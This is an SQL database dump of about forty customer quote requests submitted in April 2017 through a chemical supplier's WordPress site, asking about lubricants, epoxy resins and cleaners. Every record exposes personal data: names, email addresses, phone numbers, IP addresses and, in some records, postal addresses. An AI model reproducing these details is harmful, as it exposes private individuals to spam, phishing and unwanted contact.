INSERT INTO `wp_enquiry_detail_new` VALUES (774, 'oscar rocha', 'ro.goa@hotmail.com', 'Hi\n\ni need a quote on your gpl 227 cartridge 40 pieces .', '011526862921685', 'grease gpl 227', '201.171.219.166', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"852";s:5:"title";s:7:"GPL 227";s:5:"price";s:0:"";s:5:"quant";s:2:"40";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_316632911.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-08 00:51:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (775, 'bhawnesh bhardwaj', 'bhawneshbhardwaj@agastyaaeroworks.in', 'Require  100 Kg Grease Krytox NRT 8904 for defence usage with OEM support certificate. Quote required urgently please.', '+917503350959', 'Grease Krytox NRT 8904', '27.5.17.181', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"878";s:5:"title";s:8:"NRT 8904";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_315050906.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-08 06:41:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (776, 'Zhilin Tian', 'zltian10s@gmail.com', 'May I know the price of EPON862 and EPIKURE W.\nThank you', '', 'EPON862 EPIKURE W', '137.189.35.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-08 14:55:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (777, 'Bram Wyllie', 'bramwyllie@gmail.com', 'Could I get a quote for a 2 oz. Needle Nose bottle of this lubricant?', '', '', '142.162.45.244', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-08 19:42:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (778, 'Bram Wyllie', 'bramwyllie@gmail.com', 'Could I get a quote on the 2 oz. Needle Nose Bottle of this lubricant?', '', '', '142.162.45.244', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-08 19:47:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (779, 'Rich Humphrey ', 'Richard_humphrey@yahoo.com', 'Please send price per quart', '513405-3114', 'Epon 862', '75.115.28.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-09 15:09:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (780, 'reza jafari', 'r11jafari@gmail.com', 'could u please send the price of 1 gal ?\nthanks', '514404-7946', '', '70.30.255.75', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-09 17:20:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (781, 'Chris Fish', 'cnf500@gmail.com', 'We would like to get the pricing structure for the Epikure 3055 - qt,    gal   5gal    drum.\nunderstand it will function with the 828 and give us additional options.\n\nThank You,\nChris', '541944-7056', 'pricing for the Epikure 3055', '71.11.72.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1168";s:5:"title";s:15:"EPIKURE™ 3055";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-09 21:58:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (782, 'Tony WANG', 'ruizhx@163.com', 'I am lab materials distributor in Beijing, China. Would you please quote with shipping fee and lead time？ Thanks!', '+861082731987', '', '36.110.101.152', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1183";s:5:"title";s:15:"EPIKURE™ 3223";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3223.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-10 07:54:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (783, 'Marilydia Solano', 'msolano@skytrade.net', 'Please let me know price and availability \n\nMS260 – GLASS CLEANER\nQTY: 12 cans (16 oz)\nThanks, \n', '305592-6192', 'RFQ 49736', '38.126.192.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-10 16:18:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (784, 'Ivy Castillo', 'ivy.castillo@neotech.com', 'Good Morning,\n\nPlease provide a quote for 2 Gallons of MS-557.\n\nthank you \n', '818734-6584', 'urgent quote ', '63.158.182.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-10 17:31:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (785, 'Andre Braga', 'aerologistic3@scross.com', 'Good afternoon,\n\nplease quote this item:\n\nMS-260  12ea\n', '954607-1450', 'RFQ', '191.240.27.143', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-10 18:14:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (786, 'Nicole Weber ', 'nweber@blueorigin.com', 'I would just like a price quote on the different sizes of GPL 103 that is available. ', '253234-6677', 'GPL-103', '72.165.233.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-11 00:28:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (787, 'Nicole Weber', 'nweber@blueorigin.com', 'Looking for a price quote for all sizes available of 143 AA. \n\nThank You ', '', '', '72.165.233.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"579";s:5:"title";s:5:"143AA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_204603724.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-11 00:39:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (788, 'Suzanne J Hackenberry', 'sjkenn623@gmail.com', 'Our company is interested in your product to use in our manufacturing process. Could you please send pricing or a sample:\nSensor Networks, Inc\nAttn: Suzanne Hackenberry\n176-500 Technology Drive\nBoalsburg, PA 16827\n\nThank you,\nSuzanne Hackenberry\nSenior Assembler\n', '717348-8083', 'M-122 dry mold release', '174.54.68.158', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-11 10:18:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (789, 'Heather Jenkins', 'hjenkins@draper.com', 'Hello,\nI am from Draper Laboratory. I am looking for a quote on one of you products: MS-782 ( 5 GALLON PAIL ). Please let me know if you need any other information, I look forward to your response. \n \nSincerely \nHeather Jenkins| Draper \n555 Technology Square, MS1 | Cambridge, MA 02139-3563\nEmail: hjenkins@draper.com\n', '1617-258-3440', 'Draper Lab Quote for the MS-782', '192.80.95.230', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-11 18:44:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (790, 'Gary Muterspaw', 'gmuterspaw@sanderscomposites.com', 'Urgent ROM quote required, approx. cost of a 5 gallon container. . . please help! and thanks', '858514-6321', 'Epon 828 Resin', '64.73.249.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-11 19:01:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (791, 'Olivia Rodriguez', 'olivia.r.rodriguez@lmco.com', 'Please email me an SDS of this material. Product is on-site, thank you.', '407356-8590', 'Requesting Safety Data Sheet', '192.35.35.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-11 19:23:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (792, 'Tim Hall', 'Timhallaudio@gmail.com', 'I teach an electronics class at the Art Institute of TN, and I\'m looking to have my class clean out all of the switches on our 48 channel SSL console, and I was wondering how I can purchase this cleaner, how much it would cost per can, and how quickly could I receive it?', '504220-4148', 'Need Contact cleaner for audio switches', '174.195.140.97', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-11 22:14:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (793, 'Todd', 'todd.r.coons@intel.com', 'Can you please send me a quote and where to buy?', '480554-8321', 'Pricing and shipping cost', '134.134.139.83', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1668";s:5:"title";s:8:"MS-381HC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-11 23:15:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (794, 'Timothy Vernon', 'timothy_vernon@berkeley.edu', 'Greetings, \n\nRunning a micro-emulsion experiment. Would it be possible to get a sample of the Krytox 157 FSL oil?\n\nThanks, \nTim Vernon', '708548-7499', 'Krytox 157 FSL', '136.152.142.123', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:11:"17085487499";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 00:27:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (795, 'Stephanie Yu', 'stephanie.yu@cnpcusa.com', 'Can I buy a small quantity (1L)?  How much is the price for?  Where can I buy it?', '', 'price', '67.200.179.102', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 12:31:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (796, 'Melissa Rogers', 'mrogers@tyonekgroup.com', 'Hello, \nI need a price with delivery and lead time.', '256258-6200', 'RFQ ref TFD-005172 ST3', '208.87.238.180', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 14:01:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (797, 'Elisha', 'edalager@northernsafety.com', 'I am looking for a quote on the following 2 items:\nMS-242N &amp; MS-222N.\n\nThank you!', '281471-3368', 'quote', '209.217.217.200', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 14:29:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (798, 'nigel vieira', 'nigel.vieira@exxonmobil.com', 'Hello,\n\nCan I get a price quote for (x3) 1 gallon bottles of Epn 815C Resin?   Thanks.', '', 'Price quote ', '10.136.245.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 15:10:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (799, 'JAmes nelson', 'jnelon1@mmm.com', 'need quote on 1 x 55 gallon drum. Please rush quote. ', '651736-5295', 'epon 826', '108.171.131.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 15:34:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (800, 'jim nelson', 'jnelson1@mmm.com', 'error with email\n\nplease rush quote of 1 55 gallon drum', '651736-5295', 'EPON 826', '108.171.131.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 15:35:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (801, 'Roman Goltz', 'roman.goltz@bendix.com', 'Hi,\n\nCould you please provide me with a price quote, including shipping cost, of a single 0.5kg bottle of DuPont Krytox GPL 105 to:\n4661 Brentlawn Drive,\nBurnaby, BC, V5C3V3\n\nThank you in advance,\n\nSincerely, \nRoman Goltz\nBendix CVS Senior Application Engineer ', '604807-7599', 'Pricing on .5kg single bottle of GPL 105', '24.84.132.57', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 18:15:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (802, 'Farhad Kermani', 'friazike@uwaterloo.ca', 'Hello,\nI would like to order a pack of Epoxy 907. I was wondering if you have a distributor in Canada or I have to order it directly from the US. \nThank you,\nFarhad Kermani ', '519954-0985', 'Epoxy 907', '174.115.202.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 19:45:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (803, 'Adam Cacheiro', 'acacheiro@psemc.com', 'Looking for a quote on a batch of 2,000. ', '480763-3011', 'Flux Solvent', '208.95.94.67', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-12 20:36:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (804, 'Janine', 'Jpeacock@usdynamicscorp.com', 'Please quote MIN buy?', '631842-5600', 'RFQ 1700171-41', '75.99.5.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:7:"MS-475C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-13 19:06:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (805, 'Chad Schmitz', 'cschmitz@kranzinc.com', 'Hello,\nCan you tell me who/where I may be able to purchase your Skin Degreaser from?  We are located in Wisconsin.\nThank you.', '262638-2212', 'H1112B - Skin Degreaser', '66.185.28.74', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3363";s:5:"title";s:22:"H-1112B Skin Degreaser";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_280855511.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-13 20:57:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (806, 'Ernest Werbel', 'ernest@werbelmicrowave.com', 'Looking for equivalent to MG Chemicals 4140-1L for use in ultrasonic cleaner. Please quote your best price breaks.', '973515-3001', 'Flux remover', '173.70.156.13', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1695";s:5:"title";s:33:"MS-560 &#038; MS-562 Flux Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/miller-stephenson-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-15 22:27:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (807, 'Anthony', 'NATAV.SOLUTIONS@gmail.com', 'Hello, I am looking to inquiring about purchasing ms260 for my cleaning company, we specialize in marine and Aviation.  Would be looking to purchase this by the box. Thanks. ', '631681-7180', 'Product order', '67.87.218.161', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-16 03:42:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (808, 'NAMIL KANG', 'nadukang@hanmail.net', 'Dear Sir,\n\nWe are a trading company in Seoul, Korea.\nWe\'d like to buy MA-143TE.\nPLease send us the quotation including a delivery.\n\nBest Regards,\n\nBYC/N.I.KANG', '', 'We\'d like to buy MA-143TE', '221.148.141.37', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-17 04:52:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (809, 'SUE', 'ZUEALAMO@AIRWAYAEROSPACE.COM', 'Good morning I am interested n purchasing the following but only a quart, please advice on the price and lead-time of such item let me know the price , lead-time and traceability of the item.  thank you kindly Sue ', '305591-2405', 'EPON 828 RESIN ', '108.132.211.144', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-17 13:14:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (810, 'martin melgoza', 'martin.melgoza@solvay.com', 'MS-122AD\nplease quote 2 cases ', '714632-8444', 'quote ', '150.251.3.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-17 13:57:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (811, 'carl dildine', 'carl.dildine@airgas.com', 'can you send me the price for 6 cans of vertrel ms-750 cleaning agent ', '870413-9016', 'price quote', '165.225.34.49', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"6";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-17 14:10:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (812, 'Jess Evans', 'evans@aculon.com', 'Looking for 2 x one gallon bottles. ', '858350-9474', 'Aculon, Inc. inquiry', '66.185.164.236', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-17 15:13:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (813, 'Eric Franzoi', 'efranzoi@alcore.com', 'need pricing on a lab sized (Pint, quart) of EPIKURE™ W for evaluation.', '410676-7100', 'EPIKURE™ W', '66.162.75.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-17 17:04:20', '', NULL, '', '', '', NULL, '', ''); 
